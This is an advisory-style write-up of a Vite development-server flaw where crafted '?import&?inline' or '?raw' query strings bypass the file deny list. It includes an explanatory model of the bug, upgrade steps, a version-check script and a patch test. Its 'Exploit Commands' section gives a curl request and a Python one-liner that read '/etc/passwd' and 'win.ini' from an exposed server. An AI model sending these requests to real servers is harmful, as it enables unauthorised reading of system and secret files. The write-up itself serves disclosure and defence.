Vite, Server-Side File Disclosure, CVE-2025-XXXX (Medium)

How the CVE Works:

Vite’s development server fails to enforce `server.fs.deny` when a request combines the `?import` query with the `?inline` or `?raw` modifiers. By crafting a URL such as /@fs/path/to/file?import&?inline=1.wasm?init (or /@fs/path/to/file?import&?raw??), an unauthenticated client can read any file the dev-server process is able to open, with the contents handed back inside a module. The bypass exists because the server processes this sequence of query parameters incorrectly and ends up comparing the wrong string against the deny list instead of the resolved file path. Only dev servers that are exposed to the network (started with `--host` or with `server.host` set) are reachable by an attacker; the fix is to upgrade to 6.2.4, 6.1.3, 6.0.13, 5.4.16 or 4.5.11.
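The following is an added illustration, not Vite's own code: a simplified model of the bug class the paragraph describes (a deny check run on a request string from which the `?import` marker was cut, leaving the rest of the query glued to the file name) next to a check that parses the URL, maps the `/@fs/` prefix to a filesystem path, normalises it, and only then consults the deny list. The deny patterns are Vite's documented defaults (with brace expansion dropped) plus a `passwd` entry added for the demo; the probe URLs are constructed from the advisory's two bypass shapes.

```javascript
// Added example, not part of Vite. Models a deny check done on the raw request
// string ("naive") against one done on the resolved filesystem path ("resolved").

// Vite's default server.fs.deny patterns (brace expansion omitted) plus a demo entry.
const DENY = ['.env', '.env.*', '*.pem', '**/.git/**', 'passwd'];

// Minimal glob -> RegExp: "**" spans directories, "*" and "?" stay within one segment.
function globToRegex(glob) {
  let re = '';
  for (let i = 0; i < glob.length; i++) {
    const c = glob[i];
    if (c === '*' && glob[i + 1] === '*') { re += '.*'; i++; }
    else if (c === '*') re += '[^/]*';
    else if (c === '?') re += '[^/]';
    else re += c.replace(/[.+^${}()|[\]\\]/g, '\\$&');
  }
  return new RegExp(`^${re}$`);
}

// Patterns without a slash match the file name only (matchBase semantics);
// patterns with a slash match the whole path.
function matchesDeny(fsPath) {
  const base = fsPath.slice(fsPath.lastIndexOf('/') + 1);
  return DENY.some((g) => globToRegex(g).test(g.includes('/') ? fsPath : base));
}

// Collapse "." and ".." segments of an absolute POSIX path.
function normalizePosix(p) {
  const out = [];
  for (const seg of p.split('/')) {
    if (seg === '' || seg === '.') continue;
    if (seg === '..') out.pop(); else out.push(seg);
  }
  return '/' + out.join('/');
}

// VULNERABLE MODEL: remove the "?import" marker from the string, then cut at the
// first "?". For "/@fs/etc/passwd?import&?inline=1.wasm?init" that leaves
// "/@fs/etc/passwd&", whose basename "passwd&" matches no deny entry.
function isDeniedNaive(reqUrl) {
  const stripped = reqUrl.replace('?import', '').split('?')[0];
  return matchesDeny(stripped);
}

// HARDENED: parse the request as a URL (everything from the first "?" onward is
// query, whatever it contains), map /@fs/ to the real path, normalise, then check.
function isDeniedResolved(reqUrl) {
  const { pathname } = new URL(reqUrl, 'http://localhost:5173');
  const fsPath = pathname.startsWith('/@fs/') ? pathname.slice('/@fs'.length) : pathname;
  return matchesDeny(normalizePosix(decodeURIComponent(fsPath)));
}

// Constructed probes: a plain request plus the advisory's two bypass shapes.
const PROBES = [
  '/@fs/etc/passwd',
  '/@fs/etc/passwd?import&?inline=1.wasm?init',
  '/@fs/etc/passwd?import&?raw??',
];
for (const u of PROBES) {
  console.log(u.padEnd(44), 'naive denied:', isDeniedNaive(u), ' resolved denied:', isDeniedResolved(u));
}
```

The naive variant blocks the plain request and lets both crafted ones through, which is the behaviour the advisory describes; the resolved variant blocks all three because the deny list is matched against `/etc/passwd` no matter what follows the first `?`.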

DailyCVE Form:

Platform: Vite
Version: 4.0.0 through 6.2.3 (patched in 4.5.11, 5.4.16, 6.0.13, 6.1.3, 6.2.4)
Vulnerability: FS deny bypass
Severity: Medium
Date: 2025-03-31

What Undercode Say:

Analytics:

  • Attack Vector: Network
  • Complexity: Low
  • Privileges Required: None
  • User Interaction: None
  • Scope: Unchanged

Exploit Commands:

# inline variant; a patched server answers 403, an affected one returns the file contents embedded in a module
curl "http://vite-dev-server:5173/@fs/etc/passwd?import&?inline=1.wasm?init"
# raw variant against a Windows host (the quotes keep the shell from interpreting ? and &)
python3 -c "import requests; print(requests.get('http://localhost:5173/@fs/C:/Windows/win.ini?import&?raw??').text)"

Protection Commands:

npm update vite --save-dev
# confirms the installed release is one of the first patched versions (any later release is fixed too)
npx vite --version | grep -E '6\.2\.4|6\.1\.3|6\.0\.13|5\.4\.16|4\.5\.11'

Mitigation Code:

Note: server.fs.deny is the very control this bug bypasses, so tightening it does not stop the exploit on an affected release. Update Vite to a patched version and, until then, keep the dev server off the network (no --host, no server.host). The config below remains worth keeping as defence in depth.

// vite.config.js
export default {
  server: {
    fs: {
      strict: true,
      // Vite's default deny list; extend it with any other files the dev server must never serve
      deny: ['.env', '.env.*', '*.{crt,pem}', '**/.git/**']
    }
  }
}

Detection Script:

#!/bin/bash
# Compare the installed vite against the first patched release of its minor line
VITE_VERSION=$(npm ls vite --depth=0 2>/dev/null | grep -o 'vite@[0-9.]*' | head -1 | cut -d@ -f2)
[ -z "$VITE_VERSION" ] && { echo "vite not found in this project"; exit 1; }
case "$VITE_VERSION" in
  4.*)   FIXED=4.5.11 ;;
  5.*)   FIXED=5.4.16 ;;
  6.0.*) FIXED=6.0.13 ;;
  6.1.*) FIXED=6.1.3 ;;
  6.2.*) FIXED=6.2.4 ;;
  *) echo "vite $VITE_VERSION is outside the affected range"; exit 0 ;;
esac
# if the installed version sorts below the fixed one it is still vulnerable
if [ "$(printf '%s\n' "$VITE_VERSION" "$FIXED" | sort -V | head -1)" != "$FIXED" ]; then
  echo "Vulnerable version detected: vite $VITE_VERSION (fixed in $FIXED)"
fi

Patch Verification:

// test-vite-fs.mjs (ESM so top-level await works; run: node test-vite-fs.mjs, Node 18+ for fetch)
import { createServer } from 'vite';
import { writeFileSync } from 'node:fs';

writeFileSync('.secret', 'do-not-serve'); // file the deny rule must hide
const server = await createServer({
  logLevel: 'silent',
  server: { host: '127.0.0.1', fs: { strict: true, deny: ['.secret'] } },
});
await server.listen(); // createServer() alone does not bind a port
const url = new URL('/@fs' + process.cwd() + '/.secret?import&?inline=1.wasm?init', server.resolvedUrls.local[0]);
const res = await fetch(url);
await server.close();
console.assert(res.status === 403, `Vulnerable! deny bypassed (HTTP ${res.status})`);

References:

Reported By: https://github.com/advisories/GHSA-4r4m-qw57-chr8